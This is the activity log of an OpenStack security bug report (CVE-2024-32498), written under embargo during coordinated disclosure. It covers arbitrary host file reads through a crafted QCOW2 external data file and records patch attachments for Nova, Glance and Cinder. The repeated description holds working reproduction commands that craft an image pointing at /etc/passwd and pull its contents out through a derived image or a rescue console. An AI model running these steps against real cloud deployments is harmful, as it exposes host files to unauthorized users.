2024-03-29 19:31:33 |
Martin Kaesberger |
bug |
|
|
added bug |
2024-03-30 16:59:25 |
Jeremy Stanley |
description |
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-06-28 and will be made
public by or on that date even if no fix is identified.
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
|
2024-03-30 17:00:04 |
Jeremy Stanley |
bug task added |
|
ossa |
|
2024-03-30 17:00:11 |
Jeremy Stanley |
ossa: status |
New |
Incomplete |
|
2024-03-30 17:00:48 |
Jeremy Stanley |
bug |
|
|
added subscriber Nova Core security contacts |
2024-04-01 14:44:35 |
Dan Smith |
attachment added |
|
nova-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761072/+files/nova-2059809.patch |
|
2024-04-01 15:09:47 |
Dan Smith |
attachment added |
|
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761103/+files/glance-2059809.patch |
|
2024-04-01 15:38:32 |
Dan Smith |
attachment added |
|
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761104/+files/glance-2059809.patch |
|
2024-04-01 15:39:09 |
Dan Smith |
attachment removed |
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761103/+files/glance-2059809.patch |
|
|
2024-04-01 15:40:42 |
Dan Smith |
bug task added |
|
glance |
|
2024-04-01 15:40:55 |
Dan Smith |
bug task added |
|
cinder |
|
2024-04-01 15:41:21 |
Dan Smith |
bug |
|
|
added subscriber Brian Rosmaita |
2024-04-01 18:17:21 |
Brian Rosmaita |
bug |
|
|
added subscriber Eric Harney |
2024-04-01 21:14:14 |
Brian Rosmaita |
attachment added |
|
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761133/+files/cinder-2059809.patch |
|
2024-04-01 21:20:27 |
Brian Rosmaita |
attachment removed |
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761133/+files/cinder-2059809.patch |
|
|
2024-04-01 21:22:39 |
Brian Rosmaita |
attachment added |
|
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761134/+files/cinder-2059809.patch |
|
2024-04-02 12:44:34 |
Brian Rosmaita |
attachment removed |
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761134/+files/cinder-2059809.patch |
|
|
2024-04-02 12:45:09 |
Brian Rosmaita |
attachment added |
|
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761279/+files/cinder-2059809.patch |
|
2024-04-02 12:49:04 |
Jeremy Stanley |
bug |
|
|
added subscriber Arnaud Morin |
2024-04-02 12:49:16 |
Jeremy Stanley |
bug |
|
|
added subscriber Guillaume Espanel |
2024-04-02 12:49:28 |
Jeremy Stanley |
bug |
|
|
added subscriber Pierre-Samuel LE STANG |
2024-04-02 12:49:43 |
Jeremy Stanley |
bug |
|
|
added subscriber Pierre Libeau |
2024-04-02 13:08:06 |
Jeremy Stanley |
bug |
|
|
added subscriber Julien LE JEUNE |
2024-04-02 13:19:00 |
Arnaud Morin |
attachment added |
|
nova.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761287/+files/nova.patch |
|
2024-04-02 13:19:22 |
Arnaud Morin |
attachment added |
|
glance.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761288/+files/glance.patch |
|
2024-04-02 13:19:47 |
Arnaud Morin |
attachment added |
|
cinder.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761289/+files/cinder.patch |
|
2024-04-03 12:10:01 |
Brian Rosmaita |
cinder: status |
New |
In Progress |
|
2024-04-03 12:10:05 |
Brian Rosmaita |
cinder: importance |
Undecided |
Critical |
|
2024-04-03 12:10:10 |
Brian Rosmaita |
cinder: assignee |
|
Brian Rosmaita (brian-rosmaita) |
|
2024-04-03 12:10:34 |
Brian Rosmaita |
glance: status |
New |
In Progress |
|
2024-04-03 12:10:37 |
Brian Rosmaita |
glance: importance |
Undecided |
Critical |
|
2024-04-03 12:11:06 |
Brian Rosmaita |
glance: assignee |
|
Dan Smith (danms) |
|
2024-04-03 12:11:12 |
Brian Rosmaita |
nova: status |
New |
In Progress |
|
2024-04-03 14:39:03 |
Dan Smith |
attachment added |
|
nova-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761473/+files/nova-2024.1-2059809.patch |
|
2024-04-03 14:39:25 |
Dan Smith |
attachment added |
|
nova-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761474/+files/nova-2023.2-2059809.patch |
|
2024-04-03 14:39:46 |
Dan Smith |
attachment added |
|
nova-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761475/+files/nova-2023.1-2059809.patch |
|
2024-04-03 14:39:59 |
Dan Smith |
attachment added |
|
nova-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761476/+files/nova-zed-2059809.patch |
|
2024-04-03 14:43:39 |
Dan Smith |
attachment added |
|
glance-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761477/+files/glance-2024.1-2059809.patch |
|
2024-04-03 14:44:01 |
Dan Smith |
attachment added |
|
glance-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761478/+files/glance-2023.2-2059809.patch |
|
2024-04-03 14:44:21 |
Dan Smith |
attachment added |
|
glance-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761479/+files/glance-2023.1-2059809.patch |
|
2024-04-03 14:44:37 |
Dan Smith |
attachment added |
|
glance-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761480/+files/glance-zed-2059809.patch |
|
2024-04-03 16:06:57 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-2024.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761489/+files/cinder-2059809-2024.1.patch |
|
2024-04-03 16:08:07 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-2023.2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761490/+files/cinder-2059809-2023.2.patch |
|
2024-04-03 16:08:47 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-2023.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761491/+files/cinder-2059809-2023.1.patch |
|
2024-04-03 16:09:40 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-zed.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761492/+files/cinder-2059809-zed.patch |
|
2024-04-03 16:10:41 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-yoga.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761493/+files/cinder-2059809-yoga.patch |
|
2024-04-05 18:40:46 |
Jeremy Stanley |
ossa: status |
Incomplete |
Confirmed |
|
2024-04-05 18:40:52 |
Jeremy Stanley |
ossa: importance |
Undecided |
High |
|
2024-04-05 18:40:57 |
Jeremy Stanley |
ossa: assignee |
|
Jeremy Stanley (fungi) |
|
2024-04-05 18:41:22 |
Jeremy Stanley |
ossa: status |
Confirmed |
Triaged |
|
2024-04-05 19:39:58 |
Jeremy Stanley |
ossa: status |
Triaged |
In Progress |
|
2024-04-07 22:46:48 |
Martin Kaesberger |
attachment added |
|
qmp.sh https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761999/+files/qmp.sh |
|
2024-04-12 16:58:55 |
Brian Rosmaita |
bug |
|
|
added subscriber Cinder Core security contacts |
2024-04-15 12:53:46 |
Jeremy Stanley |
cve linked |
|
2024-32498 |
|
2024-04-16 19:05:04 |
Dan Smith |
attachment added |
|
glance-format-inspector-extend.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766361/+files/glance-format-inspector-extend.patch |
|
2024-04-16 19:05:17 |
Dan Smith |
attachment added |
|
glance-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766362/+files/glance-use-format-inspector-for-detect.patch |
|
2024-04-17 13:48:58 |
Dan Smith |
attachment removed |
nova-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761072/+files/nova-2059809.patch |
|
|
2024-04-17 13:49:12 |
Dan Smith |
attachment removed |
glance-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761104/+files/glance-2059809.patch |
|
|
2024-04-17 13:49:17 |
Dan Smith |
attachment removed |
cinder-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761279/+files/cinder-2059809.patch |
|
|
2024-04-17 13:49:45 |
Dan Smith |
attachment removed |
nova-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761473/+files/nova-2024.1-2059809.patch |
|
|
2024-04-17 13:49:49 |
Dan Smith |
attachment removed |
nova-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761474/+files/nova-2023.2-2059809.patch |
|
|
2024-04-17 13:49:53 |
Dan Smith |
attachment removed |
nova-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761475/+files/nova-2023.1-2059809.patch |
|
|
2024-04-17 13:49:58 |
Dan Smith |
attachment removed |
nova-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761476/+files/nova-zed-2059809.patch |
|
|
2024-04-17 13:50:03 |
Dan Smith |
attachment removed |
glance-2024.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761477/+files/glance-2024.1-2059809.patch |
|
|
2024-04-17 13:50:09 |
Dan Smith |
attachment removed |
glance-2023.2-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761478/+files/glance-2023.2-2059809.patch |
|
|
2024-04-17 13:50:13 |
Dan Smith |
attachment removed |
glance-2023.1-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761479/+files/glance-2023.1-2059809.patch |
|
|
2024-04-17 13:50:19 |
Dan Smith |
attachment removed |
glance-zed-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761480/+files/glance-zed-2059809.patch |
|
|
2024-04-17 14:39:15 |
Dan Smith |
attachment added |
|
nova-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766810/+files/nova-use-format-inspector-for-detect.patch |
|
2024-04-18 16:00:06 |
Dan Smith |
attachment added |
|
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767542/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
2024-04-18 16:00:39 |
Dan Smith |
attachment added |
|
0001-Check-QCOW-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767543/+files/0001-Check-QCOW-images-with-format_inspector-for-safety.patch |
|
2024-04-18 16:00:55 |
Dan Smith |
attachment removed |
glance-format-inspector-extend.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766361/+files/glance-format-inspector-extend.patch |
|
|
2024-04-18 16:01:00 |
Dan Smith |
attachment removed |
nova-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766810/+files/nova-use-format-inspector-for-detect.patch |
|
|
2024-04-19 18:30:55 |
Dan Smith |
attachment removed |
glance-use-format-inspector-for-detect.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5766362/+files/glance-use-format-inspector-for-detect.patch |
|
|
2024-04-19 18:31:02 |
Dan Smith |
attachment removed |
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767542/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
|
2024-04-19 18:31:46 |
Dan Smith |
attachment added |
|
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768360/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
2024-04-19 18:33:35 |
Dan Smith |
attachment added |
|
0002-Add-VMDK-safety-check.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768361/+files/0002-Add-VMDK-safety-check.patch |
|
2024-04-19 18:38:29 |
Dan Smith |
attachment added |
|
0003-Reject-unsafe-qcow-and-vmdk-files.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768365/+files/0003-Reject-unsafe-qcow-and-vmdk-files.patch |
|
2024-04-22 17:38:04 |
Dan Smith |
attachment added |
|
0001-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5769490/+files/0001-Check-images-with-format_inspector-for-safety.patch |
|
2024-05-01 17:04:29 |
Dan Smith |
attachment removed |
0001-Check-QCOW-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5767543/+files/0001-Check-QCOW-images-with-format_inspector-for-safety.patch |
|
|
2024-05-01 17:04:42 |
Dan Smith |
attachment removed |
0001-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5769490/+files/0001-Check-images-with-format_inspector-for-safety.patch |
|
|
2024-05-01 17:05:20 |
Dan Smith |
attachment added |
|
0001-Reject-qcow-files-with-data-file-attributes.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773705/+files/0001-Reject-qcow-files-with-data-file-attributes.patch |
|
2024-05-01 17:06:51 |
Dan Smith |
attachment added |
|
0002-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773706/+files/0002-Check-images-with-format_inspector-for-safety.patch |
|
2024-06-04 17:16:46 |
Dan Smith |
attachment removed |
0001-Reject-qcow-files-with-data-file-attributes.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773705/+files/0001-Reject-qcow-files-with-data-file-attributes.patch |
|
|
2024-06-04 17:16:56 |
Dan Smith |
attachment removed |
0002-Check-images-with-format_inspector-for-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5773706/+files/0002-Check-images-with-format_inspector-for-safety.patch |
|
|
2024-06-04 17:19:50 |
Dan Smith |
attachment added |
|
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785885/+files/nova_bug_2059809-master.patch |
|
2024-06-04 17:20:09 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785886/+files/nova_backport-FI_bug_2059809-origin_stable_2023.2.patch |
|
2024-06-04 17:20:27 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785887/+files/nova_backport-FI_bug_2059809-origin_stable_2023.1.patch |
|
2024-06-04 17:25:45 |
Dan Smith |
attachment removed |
0001-Extend-format_inspector-for-QCOW-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768360/+files/0001-Extend-format_inspector-for-QCOW-safety.patch |
|
|
2024-06-04 17:25:50 |
Dan Smith |
attachment removed |
0002-Add-VMDK-safety-check.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768361/+files/0002-Add-VMDK-safety-check.patch |
|
|
2024-06-04 17:25:54 |
Dan Smith |
attachment removed |
0003-Reject-unsafe-qcow-and-vmdk-files.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5768365/+files/0003-Reject-unsafe-qcow-and-vmdk-files.patch |
|
|
2024-06-04 17:27:09 |
Dan Smith |
attachment added |
|
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785888/+files/glance_bug_2059809-master.patch |
|
2024-06-04 17:27:31 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785889/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.2.patch |
|
2024-06-04 17:27:48 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785890/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.1.patch |
|
2024-06-11 14:39:25 |
Dan Smith |
bug |
|
|
added subscriber Abhishek Kekane |
2024-06-13 13:31:08 |
Dan Smith |
bug |
|
|
added subscriber Luigi Toscano |
2024-06-18 16:06:43 |
Brian Rosmaita |
bug |
|
|
added subscriber Luigi Toscano |
2024-06-18 16:07:33 |
Dan Smith |
removed subscriber Luigi Toscano |
|
|
|
2024-06-18 16:32:29 |
Jeremy Stanley |
summary |
Arbitrary file access through QCOW2 external data file |
Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
|
2024-06-18 17:20:03 |
Dan Smith |
bug |
|
|
added subscriber Nick Tait |
2024-06-20 23:54:38 |
Jeremy Stanley |
bug |
|
|
added subscriber Mohammed Naser |
2024-06-21 12:24:27 |
Jeremy Stanley |
bug |
|
|
added subscriber Dr. Jens Harbott |
2024-06-21 12:25:05 |
Jeremy Stanley |
bug |
|
|
added subscriber Jake Yip |
2024-06-21 12:25:27 |
Jeremy Stanley |
bug |
|
|
added subscriber Kurt Garloff |
2024-06-21 12:25:46 |
Jeremy Stanley |
bug |
|
|
added subscriber Felix Kronlage-Dammers |
2024-06-21 12:26:03 |
Jeremy Stanley |
bug |
|
|
added subscriber simon stephan |
2024-06-21 12:26:21 |
Jeremy Stanley |
bug |
|
|
added subscriber Maximilian Stinsky |
2024-06-21 12:26:39 |
Jeremy Stanley |
bug |
|
|
added subscriber Pavlo Shchelokovskyy |
2024-06-21 12:26:55 |
Jeremy Stanley |
bug |
|
|
added subscriber Michal Arbet |
2024-06-21 15:56:27 |
Martin Kaesberger |
cve linked |
|
2024-4467 |
|
2024-06-21 16:28:11 |
Jeremy Stanley |
bug |
|
|
added subscriber Jitendra Ahuja |
2024-06-21 16:28:35 |
Jeremy Stanley |
bug |
|
|
added subscriber Zack Miele |
2024-06-24 00:27:21 |
Jake Yip |
bug |
|
|
added subscriber Sam Morrison |
2024-06-24 13:58:01 |
Jeremy Stanley |
bug |
|
|
added subscriber Felix Huettner |
2024-06-24 14:53:56 |
Dan Smith |
attachment removed |
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785888/+files/glance_bug_2059809-master.patch |
|
|
2024-06-24 14:54:01 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785889/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.2.patch |
|
|
2024-06-24 14:54:07 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785890/+files/glance_backport-FI_bug_2059809-backport-stream-vmdk-origin_stable_2023.1.patch |
|
|
2024-06-24 14:55:23 |
Dan Smith |
attachment added |
|
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792016/+files/glance-master-2059809.patch |
|
2024-06-24 14:56:01 |
Dan Smith |
attachment added |
|
Glance unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792017/+files/glance-2024.1-2059809.patch |
|
2024-06-24 14:56:25 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792018/+files/glance-2023.2-2059809.patch |
|
2024-06-24 14:56:47 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792022/+files/glance-2023.1-2059809.patch |
|
2024-06-24 15:10:57 |
Dan Smith |
attachment removed |
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785885/+files/nova_bug_2059809-master.patch |
|
|
2024-06-24 15:11:02 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785886/+files/nova_backport-FI_bug_2059809-origin_stable_2023.2.patch |
|
|
2024-06-24 15:11:09 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5785887/+files/nova_backport-FI_bug_2059809-origin_stable_2023.1.patch |
|
|
2024-06-24 15:11:41 |
Dan Smith |
attachment added |
|
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792026/+files/nova-master-2059809.patch |
|
2024-06-24 15:11:59 |
Dan Smith |
attachment added |
|
Nova unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792027/+files/nova-2024.1-2059809.patch |
|
2024-06-24 15:12:12 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792028/+files/nova-2023.2-2059809.patch |
|
2024-06-24 15:12:26 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792029/+files/nova-2023.1-2059809.patch |
|
2024-06-24 15:36:23 |
Jeremy Stanley |
bug |
|
|
added subscriber Thomas Goirand |
2024-06-24 17:35:38 |
Dan Smith |
attachment added |
|
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792045/+files/nova-master-2059809-additional.patch |
|
2024-06-24 18:11:53 |
Dan Smith |
attachment removed |
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792045/+files/nova-master-2059809-additional.patch |
|
|
2024-06-24 18:27:44 |
Dan Smith |
attachment added |
|
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792046/+files/nova-master-2059809-additional.patch |
|
2024-06-25 04:59:44 |
Jake Yip |
bug |
|
|
added subscriber Shi Yan |
2024-06-25 06:52:49 |
Thomas Goirand |
attachment added |
|
add-missing-stuff.tar.gz https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792163/+files/add-missing-stuff.tar.gz |
|
2024-06-25 09:13:27 |
Felix Huettner |
bug |
|
|
added subscriber Jonas Schäfer |
2024-06-25 09:33:58 |
Jonas Schäfer |
bug |
|
|
added subscriber Konrad Gube |
2024-06-25 11:14:59 |
Felix Huettner |
attachment added |
|
cinder-master-additional-qemu-safety.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792231/+files/cinder-master-additional-qemu-safety.patch |
|
2024-06-25 13:04:36 |
Felix Huettner |
attachment added |
|
cinder-master-additional-size-check.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792254/+files/cinder-master-additional-size-check.patch |
|
2024-06-25 14:02:43 |
Jeremy Stanley |
bug |
|
|
added subscriber Artem Goncharov |
2024-06-25 14:02:54 |
Jeremy Stanley |
bug |
|
|
added subscriber Michal Nasiadka |
2024-06-25 14:23:11 |
Dan Smith |
attachment removed |
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792046/+files/nova-master-2059809-additional.patch |
|
|
2024-06-25 14:23:55 |
Dan Smith |
attachment added |
|
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792298/+files/nova-master-2059809-additional.patch |
|
2024-06-25 17:11:50 |
Dan Smith |
attachment added |
|
nova-2024.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792359/+files/nova-2024.1-2059809-additional.patch |
|
2024-06-25 17:12:04 |
Dan Smith |
attachment added |
|
nova-2023.2-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792361/+files/nova-2023.2-2059809-additional.patch |
|
2024-06-25 17:12:18 |
Dan Smith |
attachment added |
|
nova-2023.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792362/+files/nova-2023.1-2059809-additional.patch |
|
2024-06-25 20:01:59 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-06-28 and will be made
public by or on that date even if no fix is identified.
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-07-02 and will be made
public by or on that date even if no fix is identified.
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
